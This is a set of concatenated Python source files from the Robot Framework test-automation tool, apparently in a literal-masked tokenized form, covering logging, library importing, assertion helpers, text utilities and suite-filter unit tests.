        if isinstance(tags, TagPatterns):
            return tags
        return TagPatterns(tags)

    def tag_is_critical(self, tag):
        return self.critical_tags.match(tag)

    def tag_is_non_critical(self, tag):
        return self.non_critical_tags.match(tag)

    def test_is_critical(self, test):
        # Critical patterns, when given, must match the test's tags, and
        # non-critical patterns must not.
        if self.critical_tags and not self.critical_tags.match(test.tags):
            return False
        return not self.non_critical_tags.match(test.tags)

    def __nonzero__(self):
        # Py2 truth hook; presumably mapped to __bool__ by @py2to3 — confirm
        # in robot.utils.
        return bool(self.critical_tags or self.non_critical_tags)
import os

from robot.errors import DataError

from .console import ConsoleOutput
from .filelogger import FileLogger
from .loggerhelper import AbstractLogger, AbstractLoggerProxy
from .stdoutlogsplitter import StdoutLogSplitter


class Logger(AbstractLogger):
    """Global message router: fans events out to all registered loggers.

    Maintains console, syslog, XML and listener loggers plus arbitrary
    extra loggers, caches early messages until listeners register, and
    swaps its ``log_message`` handler depending on whether a keyword is
    currently running.
    """

    def __init__(self, register_console_logger=True):
        self._console_logger = None
        self._syslog = None
        self._xml_logger = None
        self._listeners = None
        self._library_listeners = None
        self._other_loggers = []
        # Messages logged before listeners register are cached and replayed.
        self._message_cache = []
        # Depth counter of currently started keywords.
        self._started_keywords = <NUM_LIT:0>
        self._error_occurred = False
        self._error_listener = None
        self._prev_log_message_handlers = []
        # Nesting count for the context-manager protocol below.
        self._enabled = <NUM_LIT:0>
        if register_console_logger:
            self.register_console_logger()

    @property
    def start_loggers(self):
        # Extra loggers first on start events.
        loggers = [self._console_logger, self._syslog, self._xml_logger,
                   self._listeners, self._library_listeners]
        return [logger for logger in self._other_loggers + loggers if logger]

    @property
    def end_loggers(self):
        # Reversed priority on end events: listeners first, extras last.
        loggers = [self._listeners, self._library_listeners,
                   self._console_logger, self._syslog, self._xml_logger]
        return [logger for logger in loggers + self._other_loggers if logger]

    def __iter__(self):
        return iter(self.end_loggers)

    def __enter__(self):
        # First (outermost) enter activates syslog; nesting is counted.
        if not self._enabled:
            self.register_syslog()
        self._enabled += <NUM_LIT:1>

    def __exit__(self, *exc_info):
        self._enabled -= <NUM_LIT:1>
        if not self._enabled:
            self.close()

    def register_console_logger(self, type='<STR_LIT>', width=<NUM_LIT>, colors='<STR_LIT>',
                                markers='<STR_LIT>', stdout=None, stderr=None):
        logger = ConsoleOutput(type, width, colors, markers, stdout, stderr)
        self._console_logger = self._wrap_and_relay(logger)

    def _wrap_and_relay(self, logger):
        # Wrap in a proxy and replay any cached messages to the newcomer.
        logger = LoggerProxy(logger)
        self._relay_cached_messages(logger)
        return logger

    def _relay_cached_messages(self, logger):
        if self._message_cache:
            # Iterate a copy: message() may append to the cache meanwhile.
            for msg in self._message_cache[:]:
                logger.message(msg)

    def unregister_console_logger(self):
        self._console_logger = None

    def register_syslog(self, path=None, level='<STR_LIT>'):
        # Path/level fall back to environment variables; a special path
        # value disables syslog entirely.
        if not path:
            path = os.environ.get('<STR_LIT>', '<STR_LIT>')
            level = os.environ.get('<STR_LIT>', level)
        if path.upper() == '<STR_LIT>':
            return
        try:
            syslog = FileLogger(path, level)
        except DataError as err:
            self.error("<STR_LIT>" % (path, err.message))
        else:
            self._syslog = self._wrap_and_relay(syslog)

    def register_xml_logger(self, logger):
        self._xml_logger = self._wrap_and_relay(logger)

    def unregister_xml_logger(self):
        self._xml_logger = None

    def register_listeners(self, listeners, library_listeners):
        self._listeners = listeners
        self._library_listeners = library_listeners
        if listeners:
            self._relay_cached_messages(listeners)

    def register_logger(self, *loggers):
        for logger in loggers:
            logger = self._wrap_and_relay(logger)
            self._other_loggers.append(logger)

    def unregister_logger(self, *loggers):
        # Remove every proxy wrapping any of the given logger objects.
        for logger in loggers:
            self._other_loggers = [proxy for proxy in self._other_loggers
                                   if proxy.logger is not logger]

    def disable_message_cache(self):
        self._message_cache = None

    def register_error_listener(self, listener):
        self._error_listener = listener
        # Fire immediately if an error already happened before registration.
        if self._error_occurred:
            listener()

    def message(self, msg):
        """Route a run-level message to all loggers and the cache."""
        for logger in self:
            logger.message(msg)
        if self._message_cache is not None:
            self._message_cache.append(msg)
        if msg.level == '<STR_LIT>':
            self._error_occurred = True
            if self._error_listener:
                self._error_listener()

    def _log_message(self, msg):
        """Handler used while a keyword is running; escalates high levels."""
        for logger in self:
            logger.log_message(msg)
        if msg.level in ('<STR_LIT>', '<STR_LIT>'):
            self.message(msg)

    # Outside keywords, log messages are treated as run-level messages.
    log_message = message

    def log_output(self, output):
        for msg in StdoutLogSplitter(output):
            self.log_message(msg)

    def enable_library_import_logging(self):
        # Temporarily reroute log messages; restored by the pop below.
        self._prev_log_message_handlers.append(self.log_message)
        self.log_message = self.message

    def disable_library_import_logging(self):
        self.log_message = self._prev_log_message_handlers.pop()

    def start_suite(self, suite):
        for logger in self.start_loggers:
            logger.start_suite(suite)

    def end_suite(self, suite):
        for logger in self.end_loggers:
            logger.end_suite(suite)

    def start_test(self, test):
        for logger in self.start_loggers:
            logger.start_test(test)

    def end_test(self, test):
        for logger in self.end_loggers:
            logger.end_test(test)

    def start_keyword(self, keyword):
        # Entering a keyword switches log_message to the in-keyword handler.
        self._started_keywords += <NUM_LIT:1>
        self.log_message = self._log_message
        for logger in self.start_loggers:
            logger.start_keyword(keyword)

    def end_keyword(self, keyword):
        self._started_keywords -= <NUM_LIT:1>
        for logger in self.end_loggers:
            logger.end_keyword(keyword)
        # Back at top level: restore the run-level handler.
        if not self._started_keywords:
            self.log_message = self.message

    def imported(self, import_type, name, **attrs):
        for logger in self:
            logger.imported(import_type, name, attrs)

    def output_file(self, file_type, path):
        """Notify loggers that an output file has been created."""
        for logger in self:
            logger.output_file(file_type, path)

    def close(self):
        for logger in self:
            logger.close()
        # Reset to a clean state (without re-registering the console).
        self.__init__(register_console_logger=False)


class LoggerProxy(AbstractLoggerProxy):
    # Methods forwarded to the wrapped logger when it defines them.
    _methods = ('<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
                '<STR_LIT>', '<STR_LIT>', '<STR_LIT:message>', '<STR_LIT>',
                '<STR_LIT>', '<STR_LIT>', '<STR_LIT>')


# Process-wide singleton used throughout the framework.
LOGGER = Logger()
from robot import model
from robot.utils import is_string, secs_to_timestamp, timestamp_to_secs


class SuiteConfigurer(model.SuiteConfigurer):
    """Result-side suite configurer.

    Extends the base model configurer with keyword removal, log-level
    filtering, start/end time overrides and criticality settings.
    """

    def __init__(self, remove_keywords=None, log_level=None, start_time=None,
                 end_time=None, critical_tags=None, non_critical_tags=None,
                 **base_config):
        model.SuiteConfigurer.__init__(self, **base_config)
        self.remove_keywords = self._get_remove_keywords(remove_keywords)
        self.log_level = log_level
        self.start_time = self._get_time(start_time)
        self.end_time = self._get_time(end_time)
        self.critical_tags = critical_tags
        self.non_critical_tags = non_critical_tags

    def _get_remove_keywords(self, value):
        # Normalize: None -> [], single string -> one-item list.
        if value is None:
            return []
        return [value] if is_string(value) else value

    def _get_time(self, timestamp):
        # Round-trip through seconds to normalize the timestamp format;
        # missing or unparseable input yields None.
        if not timestamp:
            return None
        try:
            secs = timestamp_to_secs(timestamp, seps='<STR_LIT>')
        except ValueError:
            return None
        return secs_to_timestamp(secs, millis=True)

    def visit_suite(self, suite):
        model.SuiteConfigurer.visit_suite(self, suite)
        self._remove_keywords(suite)
        self._set_times(suite)
        suite.filter_messages(self.log_level)
        suite.set_criticality(self.critical_tags, self.non_critical_tags)

    def _remove_keywords(self, suite):
        for how in self.remove_keywords:
            suite.remove_keywords(how)

    def _set_times(self, suite):
        if self.start_time:
            suite.starttime = self.start_time
        if self.end_time:
            suite.endtime = self.end_time
import copy
import os.path

from robot.output import LOGGER
from robot.errors import FrameworkError
from robot.utils import normpath, seq2str2, is_string

from .builder import ResourceFileBuilder
from .handlerstore import HandlerStore
from .testlibraries import TestLibrary


class Importer(object):
    """Imports and caches test libraries and resource files."""

    def __init__(self):
        self._library_cache = ImportCache()
        self._resource_cache = ImportCache()

    def reset(self):
        # Drop both caches by re-running the constructor.
        self.__init__()

    def close_global_library_listeners(self):
        for lib in self._library_cache.values():
            lib.close_global_listeners()

    def import_library(self, name, args, alias, variables):
        """Import a library (cached); with an alias, return a renamed copy."""
        # Handlers are created lazily in _import_library on a cache miss.
        lib = TestLibrary(name, args, variables, create_handlers=False)
        positional, named = lib.positional_args, lib.named_args
        lib = self._import_library(name, positional, named, lib)
        if alias:
            alias = variables.replace_scalar(alias)
            lib = self._copy_library(lib, alias)
            LOGGER.info("<STR_LIT>" % (name, alias))
        return lib

    def import_resource(self, path):
        """Parse a resource file, or return the cached result for *path*."""
        if path in self._resource_cache:
            LOGGER.info("<STR_LIT>" % path)
        else:
            resource = ResourceFileBuilder().build(path)
            self._resource_cache[path] = resource
        return self._resource_cache[path]

    def _import_library(self, name, positional, named, lib):
        # Cache key includes the arguments so differently-configured
        # imports of the same library are distinct entries.
        args = positional + ['<STR_LIT>' % arg for arg in named]
        key = (name, positional, named)
        if key in self._library_cache:
            LOGGER.info("<STR_LIT>"
                        % (name, seq2str2(args)))
            return self._library_cache[key]
        lib.create_handlers()
        self._library_cache[key] = lib
        self._log_imported_library(name, args, lib)
        return lib

    def _log_imported_library(self, name, args, lib):
        # Derive a human-readable type name from the implementation class.
        type = lib.__class__.__name__.replace('<STR_LIT>', '<STR_LIT>').lower()[<NUM_LIT:1>:]
        listener = '<STR_LIT>' if lib.has_listener else '<STR_LIT>'
        LOGGER.info("<STR_LIT>"
                    "<STR_LIT>"
                    % (name, seq2str2(args), lib.version or '<STR_LIT>',
                       type, lib.scope, len(lib), listener))
        # A library with no keywords and no listener is probably a mistake.
        if not lib and not lib.has_listener:
            LOGGER.warn("<STR_LIT>" % name)

    def _copy_library(self, orig, name):
        # Shallow-copy the library and re-home each handler so the copy
        # owns an independent handler store under the new name.
        lib = copy.copy(orig)
        lib.name = name
        lib.scope = type(lib.scope)(lib)
        lib.reset_instance()
        lib.handlers = HandlerStore(orig.handlers.source,
                                    orig.handlers.source_type)
        for handler in orig.handlers._normal.values():
            handler = copy.copy(handler)
            handler.library = lib
            lib.handlers.add(handler)
        for handler in orig.handlers._embedded:
            handler = copy.copy(handler)
            handler.library = lib
            lib.handlers.add(handler, embedded=True)
        return lib


class ImportCache(object):
    """Mapping-like cache whose path keys are normalized for comparison.

    Implemented with parallel key/item lists because normalized keys may
    not be hashable (tuples containing lists, for example).
    """

    def __init__(self):
        self._keys = []
        self._items = []

    def __setitem__(self, key, item):
        if not is_string(key) and not isinstance(key, tuple):
            raise FrameworkError('<STR_LIT>')
        key = self._norm_path_key(key)
        if key not in self._keys:
            self._keys.append(key)
            self._items.append(item)
        else:
            self._items[self._keys.index(key)] = item

    def add(self, key, item=None):
        self.__setitem__(key, item)

    def __getitem__(self, key):
        key = self._norm_path_key(key)
        if key not in self._keys:
            raise KeyError
        return self._items[self._keys.index(key)]

    def __contains__(self, key):
        return self._norm_path_key(key) in self._keys

    def values(self):
        return self._items

    def _norm_path_key(self, key):
        # Normalize existing absolute paths (case-insensitively); recurse
        # into tuples so composite keys get the same treatment.
        if self._is_path(key):
            return normpath(key, case_normalize=True)
        if isinstance(key, tuple):
            return tuple(self._norm_path_key(k) for k in key)
        return key

    def _is_path(self, key):
        return is_string(key) and os.path.isabs(key) and os.path.exists(key)
"""Convenience assertion helpers raising AssertionError on failure.

Each helper optionally takes a custom message; ``values=True`` appends
the default value-based message to the custom one.
"""

from .robottypes import type_name
from .unic import unic


def fail(msg=None):
    """Fail unconditionally with the given optional message."""
    _report_failure(msg)


def assert_false(expr, msg=None):
    """Fail if *expr* is truthy."""
    if expr:
        _report_failure(msg)


def assert_true(expr, msg=None):
    """Fail if *expr* is falsy."""
    if not expr:
        _report_failure(msg)


def assert_not_none(obj, msg=None, values=True):
    """Fail if *obj* is None."""
    _msg = '<STR_LIT>'
    if obj is None:
        if msg is None:
            msg = _msg
        elif values is True:
            msg = '<STR_LIT>' % (msg, _msg)
        _report_failure(msg)


def assert_none(obj, msg=None, values=True):
    """Fail unless *obj* is None."""
    _msg = '<STR_LIT>' % obj
    if obj is not None:
        if msg is None:
            msg = _msg
        elif values is True:
            msg = '<STR_LIT>' % (msg, _msg)
        _report_failure(msg)


def assert_raises(exc_class, callable_obj, *args, **kwargs):
    """Fail unless calling *callable_obj* raises *exc_class*.

    Returns the caught exception so callers can inspect it further.
    """
    try:
        callable_obj(*args, **kwargs)
    except exc_class as err:
        return err
    else:
        # Fall back to str() for exception "classes" without the checked
        # attribute (e.g. string exceptions on very old Pythons).
        if hasattr(exc_class, '<STR_LIT>'):
            exc_name = exc_class.__name__
        else:
            exc_name = str(exc_class)
        _report_failure('<STR_LIT>' % exc_name)


def assert_raises_with_msg(exc_class, expected_msg, callable_obj, *args,
                           **kwargs):
    """Like assert_raises but also verifies the exception's message."""
    try:
        callable_obj(*args, **kwargs)
    except exc_class as err:
        assert_equal(expected_msg, unic(err),
                     '<STR_LIT>')
    else:
        if hasattr(exc_class, '<STR_LIT>'):
            exc_name = exc_class.__name__
        else:
            exc_name = str(exc_class)
        _report_failure('<STR_LIT>' % exc_name)


def assert_equal(first, second, msg=None, values=True):
    """Fail unless ``first == second``."""
    # 'not first == second' rather than '!=' so only __eq__ is required.
    if not first == second:
        _report_inequality_failure(first, second, msg, values, '<STR_LIT>')


def assert_not_equal(first, second, msg=None, values=True):
    """Fail if ``first == second``."""
    if first == second:
        _report_inequality_failure(first, second, msg, values, '<STR_LIT>')


def assert_almost_equal(first, second, places=<NUM_LIT:7>, msg=None, values=True):
    """Fail unless the values are equal when rounded to *places* decimals."""
    if round(second - first, places) != <NUM_LIT:0>:
        extra = '<STR_LIT>' % places
        _report_inequality_failure(first, second, msg, values, '<STR_LIT>', extra)


def assert_not_almost_equal(first, second, places=<NUM_LIT:7>, msg=None, values=True):
    """Fail if the values are equal when rounded to *places* decimals."""
    if round(second - first, places) == <NUM_LIT:0>:
        extra = '<STR_LIT>' % places
        _report_inequality_failure(first, second, msg, values, '<STR_LIT>', extra)


def _report_failure(msg):
    if msg is None:
        raise AssertionError()
    raise AssertionError(msg)


def _report_inequality_failure(obj1, obj2, msg, values, delim, extra=None):
    # Build the final message from the custom message, the default
    # value-based message, and the optional extra, per the flags.
    if not msg:
        msg = _get_default_message(obj1, obj2, delim)
    elif values:
        msg = '<STR_LIT>' % (msg, _get_default_message(obj1, obj2, delim))
    if values and extra:
        msg += '<STR_LIT:U+0020>' + extra
    raise AssertionError(msg)


def _get_default_message(obj1, obj2, delim):
    str1 = unic(obj1)
    str2 = unic(obj2)
    # When string representations collide, include the type names to make
    # the difference visible (e.g. 1 vs '1').
    if delim == '<STR_LIT>' and str1 == str2:
        return '<STR_LIT>' % (str1, type_name(obj1),
                              str2, type_name(obj2))
    return '<STR_LIT>' % (str1, delim, str2)
import os.path
import re

from .charwidth import get_char_width
from .misc import seq2str2
from .unic import unic

# Max length of a value shown in a variable-assignment message.
_MAX_ASSIGN_LENGTH = <NUM_LIT:200>
_MAX_ERROR_LINES = <NUM_LIT>
_MAX_ERROR_LINE_LENGTH = <NUM_LIT>
_ERROR_CUT_EXPLN = '<STR_LIT>'
_TAGS_RE = re.compile(r'<STR_LIT>', re.IGNORECASE)


def cut_long_message(msg):
    """Shorten an over-long error message, keeping its head and tail.

    Length is measured in "virtual" lines: a physical line longer than
    the max line length counts as multiple lines.
    """
    lines = msg.splitlines()
    lengths = _count_line_lengths(lines)
    if sum(lengths) <= _MAX_ERROR_LINES:
        return msg
    start = _prune_excess_lines(lines, lengths)
    end = _prune_excess_lines(lines, lengths, from_end=True)
    return '<STR_LIT:\n>'.join(start + [_ERROR_CUT_EXPLN] + end)


def _prune_excess_lines(lines, lengths, from_end=False):
    # Collect up to half the budget from one end; reversing in/out lets
    # the same forward scan serve both directions. Note: reverses the
    # caller's lists in place.
    if from_end:
        lines.reverse()
        lengths.reverse()
    ret = []
    total = <NUM_LIT:0>
    limit = _MAX_ERROR_LINES // <NUM_LIT:2>
    for line, length in zip(lines[:limit], lengths[:limit]):
        if total + length >= limit:
            ret.append(_cut_long_line(line, total, from_end))
            break
        total += length
        ret.append(line)
    if from_end:
        ret.reverse()
    return ret


def _cut_long_line(line, used, from_end):
    # Truncate a single line to whatever budget remains, marking the cut
    # on the appropriate end.
    available_lines = _MAX_ERROR_LINES // <NUM_LIT:2> - used
    available_chars = available_lines * _MAX_ERROR_LINE_LENGTH - <NUM_LIT:3>
    if len(line) > available_chars:
        if not from_end:
            line = line[:available_chars] + '<STR_LIT>'
        else:
            line = '<STR_LIT>' + line[-available_chars:]
    return line


def _count_line_lengths(lines):
    return [_count_virtual_line_length(line) for line in lines]


def _count_virtual_line_length(line):
    # Empty lines still occupy one display line.
    if not line:
        return <NUM_LIT:1>
    lines, remainder = divmod(len(line), _MAX_ERROR_LINE_LENGTH)
    return lines if not remainder else lines + <NUM_LIT:1>


def format_assign_message(variable, value, cut_long=True):
    """Format a '<var> = <value>' message for logging an assignment.

    The formatter is chosen by the variable's sigil (scalar, list, dict).
    """
    formatter = {'<STR_LIT:$>': unic, '<STR_LIT:@>': seq2str2, '<STR_LIT:&>': _dict_to_str}[variable[<NUM_LIT:0>]]
    value = formatter(value)
    if cut_long and len(value) > _MAX_ASSIGN_LENGTH:
        value = value[:_MAX_ASSIGN_LENGTH] + '<STR_LIT>'
    return '<STR_LIT>' % (variable, value)


def _dict_to_str(d):
    if not d:
        return '<STR_LIT>'
    return '<STR_LIT>' % '<STR_LIT>'.join('<STR_LIT>' % (unic(k), unic(v))
                                          for k, v in d.items())


def get_console_length(text):
    # Console width in cells; wide (e.g. East Asian) characters count as 2.
    return sum(get_char_width(char) for char in text)


def pad_console_length(text, width):
    """Truncate/pad *text* to exactly *width* console cells (min 5)."""
    if width < <NUM_LIT:5>:
        width = <NUM_LIT:5>
    diff = get_console_length(text) - width
    if diff > <NUM_LIT:0>:
        # Drop enough characters to fit the continuation marker too.
        text = _lose_width(text, diff + <NUM_LIT:3>) + '<STR_LIT>'
    return _pad_width(text, width)


def _pad_width(text, width):
    more = width - get_console_length(text)
    return text + '<STR_LIT:U+0020>' * more


def _lose_width(text, diff):
    # Remove characters from the end until at least *diff* cells are freed.
    lost = <NUM_LIT:0>
    while lost < diff:
        lost += get_console_length(text[-<NUM_LIT:1>])
        text = text[:-<NUM_LIT:1>]
    return text


def split_args_from_name_or_path(name):
    """Split 'name_or_path<sep>arg<sep>arg' into (name_or_path, args).

    If the whole string is an existing path, it is returned as-is
    (absolute) with no args.
    """
    if os.path.exists(name):
        return os.path.abspath(name), []
    index = _get_arg_separator_index_from_name_or_path(name)
    if index == -<NUM_LIT:1>:
        return name, []
    # The separator character itself delimits the individual arguments.
    args = name[index + <NUM_LIT:1>:].split(name[index])
    name = name[:index]
    if os.path.exists(name):
        name = os.path.abspath(name)
    return name, args


def _get_arg_separator_index_from_name_or_path(name):
    colon_index = name.find('<STR_LIT::>')
    # Skip a Windows drive-letter colon like 'c:/...' or 'c:\...'.
    if colon_index == <NUM_LIT:1> and name[<NUM_LIT:2>:<NUM_LIT:3>] in ('<STR_LIT:/>', '<STR_LIT:\\>'):
        colon_index = name.find('<STR_LIT::>', colon_index + <NUM_LIT:1>)
    semicolon_index = name.find('<STR_LIT:;>')
    if colon_index == -<NUM_LIT:1>:
        return semicolon_index
    if semicolon_index == -<NUM_LIT:1>:
        return colon_index
    return min(colon_index, semicolon_index)


def split_tags_from_doc(doc):
    """Split a trailing tags line off a documentation string.

    Returns ``(doc, tags)``; tags come from the last line when it matches
    the tags pattern, split on the separator and stripped.
    """
    doc = doc.rstrip()
    tags = []
    if not doc:
        return doc, tags
    lines = doc.splitlines()
    match = _TAGS_RE.match(lines[-<NUM_LIT:1>])
    if match:
        doc = '<STR_LIT:\n>'.join(lines[:-<NUM_LIT:1>]).rstrip()
        tags = [tag.strip() for tag in match.group(<NUM_LIT:1>).split('<STR_LIT:U+002C>')]
    return doc, tags
import unittest

from robot.utils.asserts import assert_equal
from robot.model import TestSuite
from robot.model.filter import Filter


class FilterBaseTest(unittest.TestCase):
    """Shared fixture: a three-level suite tree rebuilt for every check."""

    def _create_suite(self):
        # s1 -> s21 -> s31 (three tests) and s1 -> s22 (one test).
        self.s1 = TestSuite(name='<STR_LIT>')
        self.s21 = self.s1.suites.create(name='<STR_LIT>')
        self.s31 = self.s21.suites.create(name='<STR_LIT>')
        self.s31.tests.create(name='<STR_LIT>', tags=['<STR_LIT>', '<STR_LIT>'])
        self.s31.tests.create(name='<STR_LIT>', tags=['<STR_LIT>', '<STR_LIT>'])
        self.s31.tests.create(name='<STR_LIT>')
        self.s22 = self.s1.suites.create(name='<STR_LIT>')
        self.s22.tests.create(name='<STR_LIT>', tags=['<STR_LIT>', '<STR_LIT>', '<STR_LIT:X>'])

    def _test(self, filter, s31_tests, s22_tests):
        # Apply the filter to a fresh tree and compare surviving test
        # names in both leaf suites plus the total count.
        self._create_suite()
        self.s1.visit(filter)
        assert_equal([t.name for t in self.s31.tests], s31_tests)
        assert_equal([t.name for t in self.s22.tests], s22_tests)
        assert_equal(self.s1.test_count, len(s31_tests + s22_tests))


class TestFilterByIncludeTags(FilterBaseTest):

    def test_no_filtering(self):
        self._test(Filter(), ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>'], ['<STR_LIT>'])
        self._test(Filter(include_tags=[]), ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>'], ['<STR_LIT>'])

    def test_no_match(self):
        self._test(Filter(include_tags=['<STR_LIT>', '<STR_LIT>']), [], [])

    def test_constant(self):
        self._test(Filter(include_tags=['<STR_LIT>']), ['<STR_LIT>'], ['<STR_LIT>'])

    def test_string(self):
        # A single string is accepted in place of a list of tags.
        self._test(Filter(include_tags='<STR_LIT>'), ['<STR_LIT>'], ['<STR_LIT>'])

    def test_pattern(self):
        self._test(Filter(include_tags=['<STR_LIT>']), ['<STR_LIT>', '<STR_LIT>'], ['<STR_LIT>'])
        self._test(Filter(include_tags=['<STR_LIT>', '<STR_LIT>', '<STR_LIT>']), ['<STR_LIT>'], ['<STR_LIT>'])

    def test_normalization(self):
        self._test(Filter(include_tags=['<STR_LIT>', '<STR_LIT>']), ['<STR_LIT>', '<STR_LIT>'], ['<STR_LIT>'])

    def test_and_and_not(self):
        self._test(Filter(include_tags=['<STR_LIT>']), ['<STR_LIT>'], [])
        self._test(Filter(include_tags=['<STR_LIT>']), [], ['<STR_LIT>'])
        self._test(Filter(include_tags=['<STR_LIT>']), ['<STR_LIT>'], [])
        self._test(Filter(include_tags=['<STR_LIT>']), ['<STR_LIT>'], [])


class TestFilterByExcludeTags(FilterBaseTest):

    def test_no_filtering(self):
        self._test(Filter(), ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>'], ['<STR_LIT>'])
        self._test(Filter(exclude_tags=[]), ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>'], ['<STR_LIT>'])

    def test_no_match(self):
        self._test(Filter(exclude_tags=['<STR_LIT>', '<STR_LIT>']), ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>'], ['<STR_LIT>'])

    def test_constant(self):
        self._test(Filter(exclude_tags=['<STR_LIT>']), ['<STR_LIT>', '<STR_LIT>'], [])

    def test_string(self):
        self._test(Filter(exclude_tags='<STR_LIT>'), ['<STR_LIT>', '<STR_LIT>'], [])

    def test_pattern(self):
        self._test(Filter(exclude_tags=['<STR_LIT>']), ['<STR_LIT>'], [])
        self._test(Filter(exclude_tags=['<STR_LIT>', '<STR_LIT>', '<STR_LIT>']), ['<STR_LIT>'], ['<STR_LIT>'])

    def test_normalization(self):
        self._test(Filter(exclude_tags=['<STR_LIT>', '<STR_LIT>']), ['<STR_LIT>'], [])

    def test_and_and_not(self):
        self._test(Filter(exclude_tags=['<STR_LIT>']), ['<STR_LIT>', '<STR_LIT>'], ['<STR_LIT>'])
        self._test(Filter(exclude_tags=['<STR_LIT>']), ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>'], [])
        self._test(Filter(exclude_tags=['<STR_LIT>']), ['<STR_LIT>', '<STR_LIT>'], ['<STR_LIT>'])
        self._test(Filter(exclude_tags=['<STR_LIT>']), ['<STR_LIT>', '<STR_LIT>'], ['<STR_LIT>'])


class TestFilterByTestName(FilterBaseTest):

    def test_no_filtering(self):
        self._test(Filter(), ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>'], ['<STR_LIT>'])
        self._test(Filter(include_tests=[]), ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>'], ['<STR_LIT>'])

    def test_no_match(self):
        self._test(Filter(include_tests=['<STR_LIT>']), [], [])

    def test_constant(self):
        self._test(Filter(include_tests=['<STR_LIT>']), ['<STR_LIT>'], ['<STR_LIT>'])
        self._test(Filter(include_tests=['<STR_LIT>', '<STR_LIT>']), ['<STR_LIT>'], [])

    def test_string(self):
        self._test(Filter(include_tests='<STR_LIT>'), ['<STR_LIT>'], ['<STR_LIT>'])

    def test_pattern(self):
        self._test(Filter(include_tests=['<STR_LIT>']), ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>'], ['<STR_LIT>'])
        self._test(Filter(include_tests=['<STR_LIT>', '<STR_LIT>', '<STR_LIT>']), ['<STR_LIT>', '<STR_LIT>'], [])

    def test_longname(self):
        # Tests can also be selected by their full (long) name.
        self._test(Filter(include_tests=['<STR_LIT>', '<STR_LIT>']), ['<STR_LIT>'], ['<STR_LIT>'])

    def test_normalization(self):
        self._test(Filter(include_tests=['<STR_LIT>', '<STR_LIT>']), ['<STR_LIT>', '<STR_LIT>'], ['<STR_LIT>'])


class TestFilterBySuiteName(FilterBaseTest):

    def test_no_filtering(self):
        self._test(Filter(), ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>'], ['<STR_LIT>'])
        self._test(Filter(include_suites=[]), ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>'], ['<STR_LIT>'])

    def test_no_match(self):
        self._test(Filter(include_suites=['<STR_LIT>']), [], [])

    def test_constant(self):
        self._test(Filter(include_suites=['<STR_LIT>']), [], ['<STR_LIT>'])
        self._test(Filter(include_suites=['<STR_LIT>', '<STR_LIT>']), ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>'], ['<STR_LIT>'])

    def test_string(self):
        self._test(Filter(include_suites='<STR_LIT>'), [], ['<STR_LIT>'])

    def test_pattern(self):
        self._test(Filter(include_suites=['<STR_LIT>']), ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>'], [])

    def test_reuse_filter(self):
        # The same Filter instance must be reusable across visits.
        filter = Filter(include_suites=['<STR_LIT>'])
        self._test(filter, [], ['<STR_LIT>'])
        self._test(filter, [], ['<STR_LIT>'])

    def test_parent_name(self):
        self._test(Filter(include_suites=['<STR_LIT>']), ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>'], [])
        self._test(Filter(include_suites=['<STR_LIT>']), ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>'], [])
        self._test(Filter(include_suites=['<STR_LIT>']), [], ['<STR_LIT>'])
        self._test(Filter(include_suites=['<STR_LIT>']), [], [])

    def test_normalization(self):
        self._test(Filter(include_suites=['<STR_LIT>', '<STR_LIT>']), [], ['<STR_LIT>'])

    def test_with_other_filters(self):
        self._test(Filter(include_suites=['<STR_LIT>'], include_tests=['<STR_LIT>']), ['<STR_LIT>'], [])
        self._test(Filter(include_suites=['<STR_LIT>'], include_tags=['<STR_LIT>']), [], ['<STR_LIT>'])
        self._test(Filter(include_suites=['<STR_LIT>', '<STR_LIT>'], exclude_tags=['<STR_LIT>']), ['<STR_LIT>'], [])


class TestRemoveEmptySuitesDuringFilter(FilterBaseTest):
    """Filtering must also drop suites left without any tests."""

    def test_remove_empty_leaf_suite(self):
        self._test(Filter(include_tags='<STR_LIT>'), ['<STR_LIT>'], [])
        assert_equal(list(self.s1.suites), [self.s21])

    def test_remove_branch(self):
        self._test(Filter(include_suites='<STR_LIT>'), [], ['<STR_LIT>'])
        assert_equal(list(self.s1.suites), [self.s22])

    def test_remove_all(self):
        self._test(Filter(include_tests='<STR_LIT:none>'), [], [])
        assert_equal(list(self.s1.suites), [])


if __name__ == '<STR_LIT:__main__>':
    unittest.main()
<s> import sys <EOL> class Listener : <EOL> ROBOT_LISTENER_API_VERSION = <NUM_LIT:2> <EOL> def __init__ ( self , name = '<STR_LIT:X>' ) : <EOL> self . name = name <EOL> def start_suite ( self , name , attrs ) : <EOL> self . _log ( "<STR_LIT>" . format ( self . name ) ) <EOL> def close ( self ) : <EOL> self . _log ( "<STR_LIT>" ) <EOL> def report_file ( self , path ) : <EOL> self . _log ( "<STR_LIT>" . format ( path ) ) <EOL> def log_file ( self , path ) : <EOL> self . _log ( "<STR_LIT>" . format ( path ) ) <EOL> def output_file ( self , path ) : <EOL> self . _log ( "<STR_LIT>" . format ( path ) ) <EOL> def _log ( self , message ) : <EOL> sys . __stdout__ . write ( "<STR_LIT>" . format ( message ) ) </s>
